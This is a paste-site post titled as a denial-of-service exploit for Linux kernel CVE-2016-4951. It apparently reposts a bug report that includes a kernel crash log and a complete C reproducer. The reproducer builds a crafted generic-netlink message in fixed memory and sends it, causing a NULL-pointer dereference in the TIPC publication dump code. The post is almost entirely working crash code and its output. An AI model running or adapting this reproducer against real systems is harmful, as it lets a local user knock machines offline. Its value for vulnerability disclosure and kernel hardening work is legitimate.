CVE-2016-4951 Denial Of Service Linux Kernel

SUBMITTED BY: parthenos

DATE: May 27, 2016, 10:43 a.m.

FORMAT: Text only

SIZE: 7.1 kB

Raw Download

HITS: 29748

Report
  1. ello all,
  2. The following program triggers NULL-ptr dereference in
  3. tipc_nl_publ_dump. The kernel version is 4.6.0-rc7+ (on May 13 commit
  4. 1410b74e4061e05a5d2bffb1f99829efce27c8a9). Thanks.
  5. ----------------------------------------------------------------------------------
  6. netlink: 1 bytes leftover after parsing attributes in process
  7. `syz-executor'.
  8. kasan: CONFIG_KASAN_INLINE enabled
  9. kasan: GPF could be caused by NULL-ptr deref or user memory
  10. accessgeneral protection fault: 0000 [#1] SMP KASAN
  11. Modules linked in:
  12. CPU: 2 PID: 1346 Comm: syz-executor Not tainted 4.6.0-rc7+ #2
  13. Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
  14. Ubuntu-1.8.2-1ubuntu1 04/01/2014
  15. task: ffff88001eb1dd40 ti: ffff88001bd98000 task.ti: ffff88001bd98000
  16. RIP: 0010:[<ffffffff85940bb9>] [<ffffffff85940bb9>]
  17. tipc_nl_publ_dump+0xa39/0xdf0
  18. RSP: 0018:ffff88001bd9f428 EFLAGS: 00010246
  19. RAX: dffffc0000000000 RBX: ffff88003562efc0 RCX: ffffc900012c7000
  20. RDX: 0000000000000000 RSI: ffff880036215d98 RDI: ffff8800196fda98
  21. RBP: ffff88001bd9f678 R08: 0000000000000001 R09: 0000000000000000
  22. R10: ffffed00032dfb5a R11: 1ffffffff1131255 R12: 0000000000000000
  23. R13: ffff88002d0f8040 R14: 0000000000000000 R15: ffff88002ea220a8
  24. FS: 00007f0b7c70f700(0000) GS:ffff880036200000(0000) knlGS:0000000000000000
  25. CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
  26. CR2: 0000000020b5d7f2 CR3: 00000000301fe000 CR4: 00000000000006e0
  27. Stack:
  28. 0000000000000000 ffff88002ea22100 ffff88002ea220f8 ffff88002ea220f0
  29. 000000001bd9f520 1ffff100037b3e92 ffff88002ea220b0 ffff88001bd9f498
  30. ffffffff815bcc6e ffff880036223e40 ffff88002fd60008 0000000000000000
  31. Call Trace:
  32. [<ffffffff84b9d298>] genl_lock_dumpit+0x68/0x90
  33. net/netlink/genetlink.c:517
  34. [<ffffffff84b9250a>] netlink_dump+0x36a/0xa40
  35. net/netlink/af_netlink.c:2108
  36. [<ffffffff84b95349>] __netlink_dump_start+0x4e9/0x760
  37. net/netlink/af_netlink.c:2196
  38. [<ffffffff84b9e5f1>] genl_family_rcv_msg+0xa91/0xc30
  39. net/netlink/genetlink.c:584
  40. [<ffffffff84b9e93b>] genl_rcv_msg+0x1ab/0x260 net/netlink/genetlink.c:658
  41. [<ffffffff84b9ca3c>] netlink_rcv_skb+0x29c/0x390
  42. net/netlink/af_netlink.c:2277
  43. [<ffffffff84b9db48>] genl_rcv+0x28/0x40 net/netlink/genetlink.c:669
  44. [< inline >] netlink_unicast_kernel net/netlink/af_netlink.c:1214
  45. [<ffffffff84b9b352>] netlink_unicast+0x5a2/0x890
  46. net/netlink/af_netlink.c:1240
  47. [<ffffffff84b9bfc1>] netlink_sendmsg+0x981/0xcb0
  48. net/netlink/af_netlink.c:1786
  49. [< inline >] sock_sendmsg_nosec net/socket.c:612
  50. [<ffffffff849ee09a>] sock_sendmsg+0xca/0x110 net/socket.c:622
  51. [<ffffffff849efee8>] ___sys_sendmsg+0x728/0x860 net/socket.c:1946
  52. [<ffffffff849f1ed1>] __sys_sendmsg+0xd1/0x170 net/socket.c:1980
  53. [< inline >] SYSC_sendmsg net/socket.c:1991
  54. [<ffffffff849f1f9d>] SyS_sendmsg+0x2d/0x50 net/socket.c:1987
  55. [<ffffffff85b4b340>] entry_SYSCALL_64_fastpath+0x23/0xc1
  56. arch/x86/entry/entry_64.S:207
  57. Code: df 49 8d 7e 10 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85 df 01 00 00
  58. 4d 8b 76 10 48 b8 00 00 00 00 00 fc ff df 4c 89 f2 48 c1 ea 03 <0f> b6
  59. 14 02 4c 89 f0 83 e0 07 83 c0 01 38 d0 7c 08 84 d2 0f 85
  60. RIP [<ffffffff85940bb9>] tipc_nl_publ_dump+0xa39/0xdf0
  61. net/tipc/socket.c:2810
  62. RSP <ffff88001bd9f428>
  63. ---[ end trace e8355fded2057a4f ]---
  65. #include <unistd.h>
  66. #include <sys/syscall.h>
  67. #include <stdint.h>
  68. #include <sys/socket.h>
  69. #include <sys/mman.h>
  70. #include <linux/netlink.h>
  72. int main()
  73. {
  74. mmap((void *)0x20000000ul, 0xd7f000ul, PROT_READ|PROT_WRITE,
  75. MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0);
  76. int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
  77. *(uint64_t*)0x20000363 = (uint64_t)0x0;
  78. *(uint32_t*)0x2000036b = (uint32_t)0x0;
  79. *(uint64_t*)0x20000373 = (uint64_t)0x20001ff0;
  80. *(uint64_t*)0x2000037b = (uint64_t)0x1;
  81. *(uint64_t*)0x20000383 = (uint64_t)0x20aab000;
  82. *(uint64_t*)0x2000038b = (uint64_t)0x5;
  83. *(uint32_t*)0x20000393 = (uint32_t)0x81;
  84. *(uint64_t*)0x20001ff0 = (uint64_t)0x20001000;
  85. *(uint64_t*)0x20001ff8 = (uint64_t)0x3e;
  86. *(uint32_t*)0x20001000 = (uint32_t)0x15;
  87. *(uint16_t*)0x20001004 = (uint16_t)0x22;
  88. *(uint16_t*)0x20001006 = (uint16_t)0x71b;
  89. *(uint32_t*)0x20001008 = (uint32_t)0x2;
  90. *(uint32_t*)0x2000100c = (uint32_t)0x2;
  91. *(uint8_t*)0x20001010 = (uint8_t)0x7;
  92. *(uint8_t*)0x20001011 = (uint8_t)0x8;
  93. *(uint8_t*)0x20001012 = (uint8_t)0xa0ad8f89e1b1651f;
  94. *(uint8_t*)0x20001013 = (uint8_t)0x44;
  95. *(uint8_t*)0x20001014 = (uint8_t)0x1;
  96. *(uint32_t*)0x20001015 = (uint32_t)0x15;
  97. *(uint16_t*)0x20001019 = (uint16_t)0xfffffffffffffffa;
  98. *(uint16_t*)0x2000101b = (uint16_t)0x100;
  99. *(uint32_t*)0x2000101d = (uint32_t)0x1ff;
  100. *(uint32_t*)0x20001021 = (uint32_t)0x4;
  101. *(uint8_t*)0x20001025 = (uint8_t)0x3;
  102. *(uint8_t*)0x20001026 = (uint8_t)0x7;
  103. *(uint8_t*)0x20001027 = (uint8_t)0x4;
  104. *(uint8_t*)0x20001028 = (uint8_t)0x2;
  105. *(uint8_t*)0x20001029 = (uint8_t)0x9;
  106. *(uint32_t*)0x2000102a = (uint32_t)0x14;
  107. *(uint16_t*)0x2000102e = (uint16_t)0x1;
  108. *(uint16_t*)0x20001030 = (uint16_t)0x400;
  109. *(uint32_t*)0x20001032 = (uint32_t)0x80000000;
  110. *(uint32_t*)0x20001036 = (uint32_t)0x60;
  111. *(uint8_t*)0x2000103a = (uint8_t)0x1;
  112. *(uint8_t*)0x2000103b = (uint8_t)0x1ff;
  113. *(uint8_t*)0x2000103c = (uint8_t)0x3ff;
  114. *(uint8_t*)0x2000103d = (uint8_t)0x3;
  115. *(uint64_t*)0x20aab020 = (uint64_t)0x20;
  116. *(uint32_t*)0x20aab028 = (uint32_t)0x1;
  117. *(uint32_t*)0x20aab02c = (uint32_t)0x2;
  118. *(uint32_t*)0x20aab030 = (uint32_t)0x0;
  119. *(uint32_t*)0x20aab034 = (uint32_t)0x0;
  120. *(uint32_t*)0x20aab038 = (uint32_t)0x0;
  121. *(uint64_t*)0x20aab050 = (uint64_t)0x10;
  122. *(uint32_t*)0x20aab058 = (uint32_t)0x1;
  123. *(uint32_t*)0x20aab05c = (uint32_t)0x1;
  124. *(uint64_t*)0x20aab084 = (uint64_t)0x24;
  125. *(uint32_t*)0x20aab08c = (uint32_t)0x1;
  126. *(uint32_t*)0x20aab090 = (uint32_t)0x1;
  127. *(uint32_t*)0x20aab094 = sock;
  128. *(uint32_t*)0x20aab098 = sock;
  129. *(uint32_t*)0x20aab09c = sock;
  130. *(uint32_t*)0x20aab0a0 = sock;
  131. *(uint32_t*)0x20aab0a4 = sock;
  132. *(uint64_t*)0x20aab0c8 = (uint64_t)0x20;
  133. *(uint32_t*)0x20aab0d0 = (uint32_t)0x1;
  134. *(uint32_t*)0x20aab0d4 = (uint32_t)0x2;
  135. *(uint32_t*)0x20aab0d8 = (uint32_t)0x0;
  136. *(uint32_t*)0x20aab0dc = (uint32_t)0x0;
  137. *(uint32_t*)0x20aab0e0 = (uint32_t)0x0;
  138. *(uint64_t*)0x20aab108 = (uint64_t)0x20;
  139. *(uint32_t*)0x20aab110 = (uint32_t)0x1;
  140. *(uint32_t*)0x20aab114 = (uint32_t)0x2;
  141. *(uint32_t*)0x20aab118 = (uint32_t)0x0;
  142. *(uint32_t*)0x20aab11c = (uint32_t)0x0;
  143. *(uint32_t*)0x20aab120 = (uint32_t)0x0;
  144. sendmsg(sock, (struct msghdr *)0x20000363ul, 0x800ul);
  145. return 0;
  146. }
comments powered by Disqus